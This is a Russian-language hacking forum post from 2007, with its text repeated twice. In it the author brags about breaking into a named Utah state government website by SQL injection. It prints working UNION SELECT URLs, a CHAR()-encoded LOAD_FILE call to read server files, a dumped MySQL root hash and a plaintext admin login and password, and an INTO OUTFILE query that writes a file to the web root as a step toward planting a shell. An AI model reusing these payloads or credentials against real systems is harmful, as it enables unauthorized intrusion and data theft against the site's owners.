[53x]Shadow
14.08.2007, 02:26
В принципе банальная скуля, но все таки удалось залить шелл на gov, при фильтрации ковычек...
Подумал, новичкам будет интересно, если что модеры смело переносите в скули ;)
www.dfcm.utah.gov
Сначала как обычно:
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,concat(version(),0x3a,user(),0x 3a,database()),4,5,6,7,8/*
4.0.18-log
dfcmadmin@dfcm.utah.gov
dfcm
Думал на этом все закончится, при чем кавычки экранируются...
Но
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,user,password,5,6,7,8+from+mysq l.user+limit+0,1/*
root:2e64a4f076c68549
и есть filepriv
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,3,LOAD_FILE(CHAR(47,101,116,99, 47,104,116,116,112,100,47,99,111,110,102,47,104,11 6,116,112,100,46,99,111,110,102)),5,6,7,8+from+mys ql.user/*
читаем /etc/passwd для проверки, естественно с обходом фильтрации через char().
Заодно перелопатил все стандартные пути к конфигам, нашел вроде httpd.conf - оказался левый, ну думаю совсем плохо путей то нет((
Да еще into outfile не катит кавычки фильтруются и ничего не помагает ни хекс, ни чар(((
Зато нашел таблицу login
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,username,password,5,6,7,8+from+ login/*
и вытащил
admin:gmjbcbss
Обрадовался, есть админка и пасс подошел
http://www.dfcm.utah.gov/admin/
Но оказалась тупая цмска по управлению проектами и новостями, попытался через аплоады файлов, а там фильтрация и только .pdf вообщем парился долго, забил...
Думаю все, НО тут вспомнил про хеш рута, и решил а почему бы и нет, короче в джоник его и о счастье нашел (пасс выкладывать не буду чтобы сайт сразу не роняли все кому не лень)!
Бегом в phpMyAdmin, ну думаю пора заливать =).
Достаем пути до сайта, спасибо ettee, а то ночной затуп =\
http://www.dfcm.utah.gov/phpmyadmin/phpinfo.php
Ну и через sql заливаем
select 'test' from login into outfile '../../../apache/htdocs/df.txt';
Вообщем тестовый файл смотреть здесь http://www.dfcm.utah.gov/df.txt
ЗЫ
За стиль описания прошу сильно не ругаться, писал в почти сонном состоянии =\
Подумал, новичкам будет интересно, если что модеры смело переносите в скули ;)
www.dfcm.utah.gov
Сначала как обычно:
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,concat(version(),0x3a,user(),0x 3a,database()),4,5,6,7,8/*
4.0.18-log
dfcmadmin@dfcm.utah.gov
dfcm
Думал на этом все закончится, при чем кавычки экранируются...
Но
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,user,password,5,6,7,8+from+mysq l.user+limit+0,1/*
root:2e64a4f076c68549
и есть filepriv
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,3,LOAD_FILE(CHAR(47,101,116,99, 47,104,116,116,112,100,47,99,111,110,102,47,104,11 6,116,112,100,46,99,111,110,102)),5,6,7,8+from+mys ql.user/*
читаем /etc/passwd для проверки, естественно с обходом фильтрации через char().
Заодно перелопатил все стандартные пути к конфигам, нашел вроде httpd.conf - оказался левый, ну думаю совсем плохо путей то нет((
Да еще into outfile не катит кавычки фильтруются и ничего не помагает ни хекс, ни чар(((
Зато нашел таблицу login
http://www.dfcm.utah.gov/news.php?uniqueID=-1+union+select+1,2,username,password,5,6,7,8+from+ login/*
и вытащил
admin:gmjbcbss
Обрадовался, есть админка и пасс подошел
http://www.dfcm.utah.gov/admin/
Но оказалась тупая цмска по управлению проектами и новостями, попытался через аплоады файлов, а там фильтрация и только .pdf вообщем парился долго, забил...
Думаю все, НО тут вспомнил про хеш рута, и решил а почему бы и нет, короче в джоник его и о счастье нашел (пасс выкладывать не буду чтобы сайт сразу не роняли все кому не лень)!
Бегом в phpMyAdmin, ну думаю пора заливать =).
Достаем пути до сайта, спасибо ettee, а то ночной затуп =\
http://www.dfcm.utah.gov/phpmyadmin/phpinfo.php
Ну и через sql заливаем
select 'test' from login into outfile '../../../apache/htdocs/df.txt';
Вообщем тестовый файл смотреть здесь http://www.dfcm.utah.gov/df.txt
ЗЫ
За стиль описания прошу сильно не ругаться, писал в почти сонном состоянии =\